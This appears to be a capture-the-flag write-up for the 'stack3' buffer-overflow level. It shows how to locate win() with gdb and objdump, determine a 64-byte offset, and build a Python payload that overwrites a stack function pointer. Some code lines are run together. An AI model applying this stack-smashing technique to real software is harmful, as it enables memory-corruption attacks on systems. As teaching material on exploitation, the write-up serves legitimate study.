The goal of this challenge is to find a environment variable for the
win() func and overwriting the func pointer stored on the stack via BOF.
Things to note
gets(buffer);: The vulnerable func. It reads a line from stdin but it doesn’t check for buffer overrun → which can be vulnerable to BOF type of attacks.
win(): Winning func. Once we overflow the buffer via
gets(), we can print out the winning statement by pointing to the
win()address on the stack.
char buffer;: This limits our buffer length as 64 bytes. → which we can enter more than 64 bytes to cause a BOF.
Finding win() Address
As the website’s hints, we can search for the
win() address with gdb or objdump.
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955[objdump]
$ objdump -t stack3 |grep win
08048424 g F .text 00000014 win
Let’s create the following exploit with python:
padding = "A" * 60 # Giving 60 padding
padding+= "BBBBCCCCDDDDEEEEFFFF" # Using different letters
When we run this against the
stack3 program, we now see the “modified” value is overwritten with “0x43434343” (“0x43 = C).
So our offset value is 64 (60 + BBBB).
We have everything we need: offset value (=64) + address location for
[Exploit-2]#!/usr/bin/python# win() = 0x8048424padding = "A" * 64
padding+= "\x24\x84\x04\x08" # Little-endianprint padding
When we run this against
stack3, we can successfully print out the winning statement.
Thanks for reading!
- Stack 4 — Stack-based BOF: Basic 4